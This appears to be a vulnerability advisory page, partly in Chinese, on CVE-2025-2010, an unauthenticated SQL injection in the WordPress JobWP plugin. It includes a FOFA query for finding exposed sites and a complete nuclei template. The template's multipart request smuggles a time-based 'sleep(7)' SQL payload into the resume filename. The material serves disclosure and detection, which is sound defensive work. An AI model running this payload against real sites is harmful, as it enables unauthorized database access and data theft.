WordPress JobWP Plugin SQL Injection Vulnerability

漏洞信息

漏洞名称： WordPress JobWP Plugin SQL Injection Vulnerability

漏洞编号：

• CVE： CVE-2025-2010

漏洞类型： SQL注入

漏洞等级： 严重

漏洞描述： JobWP是WordPress的一个插件，用于创建和管理职位公告板、职位列表、职业页面和招聘功能。它广泛应用于企业和招聘网站，帮助管理员发布职位信息并收集应聘者的简历。该插件在版本2.3.9及之前存在SQL注入漏洞，攻击者可以通过未经验证的’jobwp_upload_resume’参数利用此漏洞。漏洞的根源在于对用户提供的参数进行了不充分的转义，并且现有的SQL查询缺乏足够的准备。这使得未经认证的攻击者能够将额外的SQL查询附加到现有的查询中，从而可能从数据库中提取敏感信息。成功利用此漏洞的攻击者可以执行任意SQL查询，可能导致数据泄露、权限提升或其他恶意活动。由于该漏洞不需要认证即可利用，且可以自动化攻击，因此对使用受影响版本插件的网站构成了严重威胁。建议用户立即将JobWP插件更新到2.3.9之后的版本，或者实施适当的输入验证和清理控制措施。

产品厂商： WordPress

产品名称： JobWP - Job Board, Job Listing, Career Page and Recruitment Plugin

影响版本： version <= 2.3.9

搜索语法： body=”/wp-content/plugins/jobwp”

来源： https://github.com/projectdiscovery/nuclei-templates/blob/26935ff95bd62ad1fb33c918d35549095f3bc115/http%2Fcves%2F2025%2FCVE-2025-2010.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: CVE-2025-2010

info:
  name: WordPress JobWP Plugin <= 2.3.9 - SQL Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The JobWP - Job Board, Job Listing, Career Page and Recruitment Plugin plugin for WordPress is vulnerable to SQL Injection via the 'jobwp_upload_resume' parameter in all versions up to, and including, 2.3.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  impact: |
    Successful exploitation could allow an attacker to execute arbitrary SQL queries, potentially leading to data exfiltration, privilege escalation, or other malicious activities.
  remediation: |
    Update the JobWP Plugin to version later than 2.3.9. Alternatively, implement proper input validation and sanitization controls.
  reference:
    - https://wpscan.com/vulnerability/26713902-26d8-47e3-b651-fe30d9898270/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-2010
  classification:
    cve-id: CVE-2025-2010
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 1
    product: jobwp
    fofa-query: body="/wp-content/plugins/jobwp"
  tags: cve,cve2025,wp,wordpress,wp-plugin,sqli,jobwp

flow: http(1) && http(2)

variables:
  jobid: "{{jobid}}"

http:
  - raw:
      - |
        GET /jobs/{{jobid}}/ HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        name: nonce
        group: 1
        regex:
          - 'jobwp_apply_form_nonce_field" value="([a-z0-9]+)"'
        internal: true

  - raw:
      - |
        @timeout: 30s
        POST /jobs/{{jobid}}/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEUzdqU65JI5EA04B

        ------WebKitFormBoundaryEUzdqU65JI5EA04B
        Content-Disposition: form-data; name="jobwp_apply_form_nonce_field"

        {{nonce}}
        ------WebKitFormBoundaryEUzdqU65JI5EA04B
        Content-Disposition: form-data; name="x"

        /jobs/{{jobid}}/
        ------WebKitFormBoundaryEUzdqU65JI5EA04B
        Content-Disposition: form-data; name="jobwp_apply_for"

        x
        ------WebKitFormBoundaryEUzdqU65JI5EA04B
        Content-Disposition: form-data; name="jobwp_full_name"

        x
        ------WebKitFormBoundaryEUzdqU65JI5EA04B
        Content-Disposition: form-data; name="jobwp_email"

        x@x.com
        ------WebKitFormBoundaryEUzdqU65JI5EA04B
        Content-Disposition: form-data; name="jobwp_cover_letter"

        x
        ------WebKitFormBoundaryEUzdqU65JI5EA04B
        Content-Disposition: form-data; name="jobwp_upload_resume"; filename="xxxxxx\"*sleep(7)*\".pdf"
        Content-Type: application/pdf

        x
        ------WebKitFormBoundaryEUzdqU65JI5EA04B--

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - "status_code == 200"
          - "contains_all(body, 'jobwp-', 'apply-')"
        condition: and